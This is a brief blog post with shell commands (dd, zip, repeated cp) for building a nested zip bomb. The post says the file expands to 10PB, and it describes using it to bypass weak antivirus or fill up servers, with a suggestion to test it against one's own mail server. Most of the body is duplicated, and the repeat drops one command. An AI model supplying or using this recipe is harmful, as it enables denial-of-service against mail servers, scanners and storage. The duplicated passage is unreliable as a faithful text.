Zip bombs aren't new. Since the days of bulletin board systems people have been highly compressing implausibly large files and transferring them to target machines to consume resources.
Machines these days can handle much larger files and have ever larger amounts of RAM to process them, but zip bombs can still be very useful to an attacker in bypassing weak antivirus or filling up poorly protected servers. Some antivirus software will try to expand the zip file to scan it, using a lot of resources. Others don't try to expand huge files and simply let them through. Either of these options don't really protect us.
There was a zip file going around a year or two ago called 42.zip which expands to about 4.5PB. It's good, but can we do better?
The most efficient thing to compress is a string of 00000000's. So let's start with a GB of nothing.
dd if=/dev/zero bs=1024 count=1048576
And less squeeze that as much as possible
dd if=/dev/zero bs=1024 count=1048576 | zip -9 -q zipbomb.zip -
Now let's make 10 of those zip files and zip them up into a new zip file.
cp zipbomb.zip 0.zip
cp zipbomb.zip 1.zip
cp zipbomb.zip 2.zip
cp zipbomb.zip 3.zip
cp zipbomb.zip 4.zip
cp zipbomb.zip 5.zip
cp zipbomb.zip 6.zip
cp zipbomb.zip 7.zip
cp zipbomb.zip 8.zip
cp zipbomb.zip 9.zip
rm zipbomb.zip
zip -9 -q zipbomb.zip *.zip
Now rinse and repeat that last step 7 times.
That should give you a 28k zip file that contains 10PB of useless data. Yup, that's right, half the size and twice the data. You can check it out here.
I've put my little shell script up on github if you want to take a look.
How do you use it? Well mail it through your mail server and see if it makes it...
Machines these days can handle much larger files and have ever larger amounts of RAM to process them, but zip bombs can still be very useful to an attacker in bypassing weak antivirus or filling up poorly protected servers. Some antivirus software will try to expand the zip file to scan it, using a lot of resources. Others don't try to expand huge files and simply let them through. Either of these options don't really protect us.
There was a zip file going around a year or two ago called 42.zip which expands to about 4.5PB. It's good, but can we do better?
The most efficient thing to compress is a string of 00000000's. So let's start with a GB of nothing.
dd if=/dev/zero bs=1024 count=1048576
And less squeeze that as much as possible
Now let's make 10 of those zip files and zip them up into a new zip file.
cp zipbomb.zip 0.zip
cp zipbomb.zip 1.zip
cp zipbomb.zip 2.zip
cp zipbomb.zip 3.zip
cp zipbomb.zip 4.zip
cp zipbomb.zip 5.zip
cp zipbomb.zip 6.zip
cp zipbomb.zip 7.zip
cp zipbomb.zip 8.zip
cp zipbomb.zip 9.zip
rm zipbomb.zip
zip -9 -q zipbomb.zip *.zip
Now rinse and repeat that last step 7 times.
That should give you a 28k zip file that contains 10PB of useless data. Yup, that's right, half the size and twice the data. You can check it out here.
I've put my little shell script up on github if you want to take a look.
How do you use it? Well mail it through your mail server and see if it makes it...
Comments
Post a Comment